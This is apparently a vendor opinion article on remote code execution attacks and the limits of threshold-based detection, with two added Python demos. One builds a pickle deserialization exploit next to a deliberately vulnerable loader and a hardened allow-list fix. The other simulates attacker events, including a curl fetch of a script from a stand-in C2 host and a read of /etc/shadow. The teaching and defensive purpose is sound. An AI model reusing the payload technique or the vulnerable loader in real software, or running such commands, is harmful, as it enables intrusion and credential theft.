This week CheckPoint published a new report that chronicled the regional threat landscape over the past six months. In the report, the company identified that the most common vulnerability exploit type was Remote Code Execution (RCE), which impacted 62 per cent of businesses.
This finding is not at all surprising. From an attacker’s perspective, an RCE vulnerability in a workload (the application and the infrastructure it runs on in the data center) is the gift that keeps on giving: it has been the opening move in countless attacks, not only in the UAE but across the globe.
Metaphorically speaking, an RCE vulnerability is the rocket that launches any cyberattack warhead, ransomware (LockBit, DarkSide, REvil, also known as Sodinokibi, and others) being the most visible one. RCE vulnerabilities were the root cause of the Hafnium attacks, which chained vulnerabilities in on-premises Microsoft Exchange Server to execute code on the mail servers, and of the Kaseya attack, in which REvil exploited the Kaseya VSA server to push ransomware to the endpoints it managed. The highly publicized SolarWinds supply chain attack took a different entry route, a trojanized software update, but it too depended on the adversary’s ability to run code of their choosing on victim workloads. Very early and automated protection in response to an RCE attack is essential for effective enterprise protection.
RCE: How it Works
When a crafted payload is delivered to an application with a lurking RCE vulnerability, the application hands execution control to the attacker: whatever the payload carries now runs with the application’s privileges. In cyber kill chain terms, the attack has reached the “Exploitation” stage. Wresting execution control from an application lets the attacker install the further tooling needed to perpetuate the attack and establish a two-way communication path back to the attacker’s command and control (C2) server.
At this point, the attacker effectively has keyboard control of the victim. The victim workload is entirely at the attacker’s mercy, and the attacker can perform any malicious action of their choosing: running ransomware, exfiltrating critical data, scraping user credentials, pivoting to other workloads, mining cryptocurrency, joining a botnet, and so on.
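The mechanism above, as an added example that is not part of the original article and is not Virsec’s or Check Point’s code: a data-center service that accepts serialized objects over the network and rebuilds them with Python’s `pickle`. The object names, the payload string and the marker it leaves in the environment are all constructed for the demonstration; a real payload would spawn a shell or open a reverse connection instead. The hardened `safe_loads` shows the corresponding fix, an unpickler that refuses to resolve any global the application does not expect.

```python
import io
import os
import pickle
from collections import OrderedDict

# --- Attacker side: the crafted payload ------------------------------------
class Exploit:
    """Attacker-controlled object (hypothetical name). pickle does not serialize
    an object's bytes; it serializes instructions for rebuilding it. __reduce__
    lets us make those instructions "call builtins.exec on this source string"."""
    def __reduce__(self):
        # Constructed payload: any Python would run here (spawn a shell, beacon
        # to C2, drop tools). This one only leaves a marker so the demo is safe.
        return (exec, ("import os; os.environ['RCE_DEMO'] = 'attacker code ran'",))

def craft_payload() -> bytes:
    return pickle.dumps(Exploit())

# --- Victim side, vulnerable: trusting serialized data from the network -----
def vulnerable_loads(data: bytes):
    # pickle.loads follows the embedded instructions, so execution control passes
    # to whoever built the bytes, with the application's privileges.
    return pickle.loads(data)

# --- Victim side, hardened: only rebuild the types the application expects ---
class RestrictedUnpickler(pickle.Unpickler):
    # The only global this service legitimately needs to resolve (assumption).
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        # builtins.exec, os.system, subprocess.* etc. all land here and fail
        # before any code runs.
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")

def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

def demo():
    """Returns (payload ran through the vulnerable path, payload blocked by the
    hardened path, benign object rebuilt by the hardened path)."""
    os.environ.pop("RCE_DEMO", None)
    vulnerable_loads(craft_payload())
    ran_vulnerable = os.environ.get("RCE_DEMO") == "attacker code ran"

    os.environ.pop("RCE_DEMO", None)
    blocked = False
    try:
        safe_loads(craft_payload())
    except pickle.UnpicklingError:
        blocked = "RCE_DEMO" not in os.environ

    benign = safe_loads(pickle.dumps(OrderedDict(host="db01", port=5432)))
    return ran_vulnerable, blocked, benign

if __name__ == "__main__":
    print(demo())
```

The vulnerable path never does anything that looks like an error: the bytes are well formed, `pickle.loads` returns normally, and the attacker’s code has already run by the time the application sees the result. That is the “Exploitation” stage in one line. The allow-list in `find_class` is a positive model of what the service needs, which is why it stops payloads for globals nobody has seen before rather than only known-bad ones.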
Underestimating the enemy
It is often said that adversaries reuse the same techniques. Assuming that threat actors will keep leveraging the same techniques is not only naïve but also a little self-serving for the classes of cyber security products that rely on signatures and threat feeds. Most adversaries are well funded, skilled, motivated, and highly effective.
All they need is early awareness of an RCE vulnerability and an enterprise hosting the vulnerable application. Once they are inside the enterprise data center, the attack metastasizes in seconds. If the attacker reaches the Command and Control stage of the kill chain, there is no stopping them.
RCE Vulnerabilities are particularly potent against conventional endpoint, perimeter, and threat hunting security tools.
Even though these security tools claim to work in the application’s runtime, their runtime clock effectively starts only after the attack has reached the “Actions on Objectives” stage of the kill chain, long after the attacker has gained keyboard control over the victim workload. They work by counting anomalous activities over a fixed period of time and declaring the victim under attack once a pre-defined threshold is exceeded.
A skilled attacker who paces their actions can fly under that radar and bypass the protection such tools offer entirely. At SolarWinds, the intrusion continued unabated from September 2019 to December 2020, about 15 months, before a security vendor published a specific indicator of compromise (IOC).
To achieve true protection against an attack that leverages an RCE vulnerability, the security control must kick in before the attack reaches the Command and Control (C2) stage of the kill chain. Once an attack has crossed the C2 stage, the defender is reacting to an adversary who already has a foothold and a channel in, and irreparable harm is all but guaranteed.
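The evasion described above, as an added example that is not part of the original article and does not reproduce any vendor’s product logic: a threshold-based anomaly counter of the kind the text describes, run over a constructed stream of workload events (the process names, file paths, timestamps and the 203.0.113.7 TEST-NET documentation address are all made up for the demo). Beside it is a first-deviation check built on a positive model of what the workload is allowed to do, which fires at the “Exploitation” stage rather than waiting for a count to accumulate.

```python
from collections import deque

# Constructed event stream (not real telemetry): (seconds since start, event).
# The web worker legitimately opens its config, talks to its database and
# writes its log. Everything else below is the attacker, paced ~90 s apart.
EVENTS = [
    (0,   "open /etc/app/config.yml"),
    (1,   "connect db01:5432"),
    (5,   "spawn /bin/sh -c 'id'"),                                  # RCE payload lands
    (95,  "connect 203.0.113.7:443"),                                # beacon to C2
    (185, "spawn /bin/sh -c 'curl -o /tmp/x.py http://203.0.113.7/x.py'"),  # fetch tooling
    (275, "open /etc/shadow"),                                       # credential scraping
    (365, "connect 203.0.113.7:443"),
    (455, "spawn /usr/bin/python3 /tmp/x.py"),
]

# Positive model of the workload: the complete set of actions it is allowed to
# take (assumed for this hypothetical service).
KNOWN_GOOD = {"open /etc/app/config.yml", "connect db01:5432", "write /var/log/app.log"}

def threshold_detector(events, window=60, threshold=3):
    """Classic anomaly counter: alert once more than `threshold` anomalous events
    fall inside any `window`-second span. Returns the alert time, or None."""
    recent = deque()
    for t, ev in events:
        if ev in KNOWN_GOOD:
            continue
        recent.append(t)
        while recent and t - recent[0] > window:
            recent.popleft()          # drop anomalies that aged out of the window
        if len(recent) > threshold:
            return t
    return None

def first_deviation_detector(events):
    """Positive model: the first action outside the permitted set is the alert,
    no count required. Returns (time, event), or None."""
    for t, ev in events:
        if ev not in KNOWN_GOOD:
            return t, ev
    return None

def compress(events):
    """Same events replayed one second apart: what a noisy, unskilled attacker
    looks like to the counter."""
    return [(i, ev) for i, (_, ev) in enumerate(events)]

if __name__ == "__main__":
    print("threshold, paced attacker :", threshold_detector(EVENTS))
    print("threshold, noisy attacker :", threshold_detector(compress(EVENTS)))
    print("first deviation           :", first_deviation_detector(EVENTS))
```

Against the paced stream the counter never holds more than one anomaly in any 60-second window, so it never alerts even though the attacker has spawned shells, beaconed to C2 and read the shadow file; only the compressed replay trips it. The first-deviation check flags the very first shell spawn at second 5, which is the moment the article argues protection has to start. The cost of that approach is the work of building and maintaining `KNOWN_GOOD` for each workload, which is what makes it a positive model rather than a threat feed.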
What the Cybersecurity Future Holds
Continued dependence on security controls fueled by threat feeds, even when those tools advertise AI/ML capabilities, is a losing battle. Vulnerabilities will continue to proliferate, and no amount of prior knowledge or threat hunting can keep up. For every hour a bad actor spends creating new malware, defenders spend orders of magnitude more on static and dynamic analysis to extract a reliable IOC.
[Satya Gupta is Cofounder and Chief Technology Officer at Virsec]